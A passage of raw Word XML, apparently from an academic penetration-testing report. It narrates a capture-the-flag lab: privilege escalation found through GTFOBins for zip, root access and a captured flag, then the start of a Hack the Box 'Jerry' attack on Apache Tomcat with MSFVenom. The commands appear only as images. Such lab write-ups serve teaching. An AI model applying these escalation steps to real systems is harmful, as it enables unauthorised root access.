        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5752D779" wp14:editId="359FCFE0">
            <wp:extent cx="5296359" cy="3528366"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="760259237" name="Picture 76025923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37" name="Picture 760259237" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId133"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5296359" cy="3528366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2CDDD" w14:textId="00654E8D" w:rsidR="0029584F" w:rsidRDefault="0029584F" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="_Toc111363681"/>
      <w:bookmarkStart w:id="455" w:name="_Toc111363818"/>
      <w:bookmarkStart w:id="456" w:name="_Toc111981841"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>116</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Searching GTFOBins for Zip</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fN2E5ODg3MGMtYjkwYy00OTU2LTlmNjktMWFhOTg3ODFkODIx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2027665465"/>
          <w:placeholder>
            <w:docPart w:val="376174F0CE34467184B8C93A085DA6C2"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="454"/>
      <w:bookmarkEnd w:id="455"/>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p w14:paraId="1AE672F0" w14:textId="1AB62D91" w:rsidR="009D0FD1" w:rsidRDefault="009D0FD1" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59FEDC0E" w14:textId="5491E010" w:rsidR="0029584F" w:rsidRDefault="0029584F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The result that needs to be input in the virtual machine to escalate privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0029584F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">is illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0FF368" w14:textId="59044746" w:rsidR="00EB6712" w:rsidRDefault="0029584F" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0029584F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="265F5889" wp14:editId="518124F8">
            <wp:extent cx="6012277" cy="1577340"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="760259240" name="Picture 760259240"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40" name="Picture 760259240" descr="Graphical user interface&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6017423" cy="1578690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F22DF" w14:textId="26EFB00E" w:rsidR="0029584F" w:rsidRDefault="0029584F" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="_Toc111363682"/>
      <w:bookmarkStart w:id="458" w:name="_Toc111363819"/>
      <w:bookmarkStart w:id="459" w:name="_Toc111981842"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>117</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Code to escalate privileges</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNTE2YTU3MjAtZGYyNy00ODAyLTk0NTEtYjUyOGQ0MjQ0NjM0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1363510350"/>
          <w:placeholder>
            <w:docPart w:val="BC6DCBA513504282B3F22CD21D47555A"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="457"/>
      <w:bookmarkEnd w:id="458"/>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p w14:paraId="32279FEC" w14:textId="77777777" w:rsidR="005B7BE0" w:rsidRDefault="005B7BE0" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A12D72F" w14:textId="6AE7475D" w:rsidR="00381B28" w:rsidRDefault="000F7752" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This command is now input as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00381B28">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDC68D" w14:textId="77777777" w:rsidR="00FA200E" w:rsidRDefault="00FA200E" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B5E179" w14:textId="0FD5E458" w:rsidR="00741DF8" w:rsidRDefault="000F7752" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000F7752">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13B290AD" wp14:editId="48233FF6">
            <wp:extent cx="4999355" cy="624949"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="760259242" name="Picture 76025924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42" name="Picture 760259242" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId135"/>
                    <a:srcRect t="27360" r="40524" b="61130"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5015782" cy="627002"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5B546" w14:textId="493230C3" w:rsidR="00381B28" w:rsidRDefault="00381B28" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="_Toc111363683"/>
      <w:bookmarkStart w:id="461" w:name="_Toc111363820"/>
      <w:bookmarkStart w:id="462" w:name="_Toc111981843"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>118</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Root Directory</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZTFhOWZmZTctMDkwZi00OWRkLTlkNWUtNDlmZTljYWUxOGM0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497162795"/>
          <w:placeholder>
            <w:docPart w:val="440CFC509D3C4F7396E5BCE394BFF6B3"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="460"/>
      <w:bookmarkEnd w:id="461"/>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w14:paraId="148AE3F5" w14:textId="1465D268" w:rsidR="00381B28" w:rsidRPr="00381B28" w:rsidRDefault="00381B28" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is now access to the root directory as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A list of the contents is run and the file root.txt is found. The ‘whoami’ command confirms root and the </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>’ command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is able to </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the contents of the ‘root.txt.file. The second flag is found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A100789" w14:textId="160C0FD2" w:rsidR="00381B28" w:rsidRDefault="00381B28" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251641856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CAC0476" wp14:editId="6E00FA00">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1183640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1375003</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1401203" cy="355234"/>
                <wp:effectExtent l="0" t="0" r="27940" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="760259246" name="Rectangle 760259246"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1401203" cy="355234"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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445990" id="Rectangle 760259246" o:spid="_x0000_s1026" style="position:absolute;margin-left:93.2pt;margin-top:108.25pt;width:110.35pt;height:27.9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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251632640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="248A4024" wp14:editId="4101AB2E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1183412</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1019810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="828881" cy="355234"/>
                <wp:effectExtent l="0" t="0" r="28575" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="760259245" name="Rectangle 760259245"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="828881" cy="355234"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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B607BA8" id="Rectangle 760259245" o:spid="_x0000_s1026" style="position:absolute;margin-left:93.2pt;margin-top:80.3pt;width:65.25pt;height:27.95pt;z-index:251632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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251623424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="522A0B74" wp14:editId="1E766E2A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1249899</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>20114</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="828881" cy="184196"/>
                <wp:effectExtent l="0" t="0" r="28575" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="760259244" name="Rectangle 760259244"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="828881" cy="184196"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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6BD57C" id="Rectangle 760259244" o:spid="_x0000_s1026" style="position:absolute;margin-left:98.4pt;margin-top:1.6pt;width:65.25pt;height:14.5pt;z-index:251623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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="000F7752">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11145B35" wp14:editId="54D54C36">
            <wp:extent cx="3387885" cy="1758054"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="760259243" name="Picture 76025924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42" name="Picture 760259242" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId135"/>
                    <a:srcRect t="65042" r="56486"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3401123" cy="1764923"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C799E4" w14:textId="2FF4AC77" w:rsidR="005B7BE0" w:rsidRDefault="005B7BE0" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc111363684"/>
      <w:bookmarkStart w:id="464" w:name="_Toc111363821"/>
      <w:bookmarkStart w:id="465" w:name="_Toc111981844"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>119</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: The Second Flag is captured</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYzUyMDUyMzktMjcwNS00MTA2LThmNmItZWI3MTcwNDY4ZTk0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
          <w:id w:val="-1365742095"/>
          <w:placeholder>
            <w:docPart w:val="E7073F58C37142BE903F1A32B9C3729D"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="463"/>
      <w:bookmarkEnd w:id="464"/>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w14:paraId="66D9046F" w14:textId="77777777" w:rsidR="00A3392C" w:rsidRDefault="00A3392C" w:rsidP="00A3392C"/>
    <w:p w14:paraId="0FB0AB99" w14:textId="6BB14D6A" w:rsidR="003177AE" w:rsidRDefault="005743D8" w:rsidP="00A3392C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc113190758"/>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00103ABA">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="003177AE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t>Jerry with MSF</w:t>
      </w:r>
      <w:r w:rsidR="003177AE">
        <w:t>Venom on Apache Tomcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
    </w:p>
    <w:p w14:paraId="4E5740F4" w14:textId="086AF768" w:rsidR="001F0472" w:rsidRDefault="001F0472" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hack the Box </w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve">was used for this attack. The </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t xml:space="preserve">address is 10.10.10.95 as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="006A3479">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019AFF50" w14:textId="2F245DE8" w:rsidR="001F0472" w:rsidRDefault="006A3479" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251651072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29ADBEC6" wp14:editId="61C5461D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>942827</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1648786</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="985467" cy="284269"/>
                <wp:effectExtent l="0" t="0" r="24765" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="760259289" name="Rectangle 760259289"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="985467" cy="284269"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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BA905F9" id="Rectangle 760259289" o:spid="_x0000_s1026" style="position:absolute;margin-left:74.25pt;margin-top:129.85pt;width:77.6pt;height:22.4pt;z-index:25165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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0472" w:rsidRPr="001F0472">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F567E2" wp14:editId="4A122D21">
            <wp:extent cx="5475419" cy="1956721"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="760259269" name="Picture 760259269"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69" name="Picture 760259269" descr="Chart&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
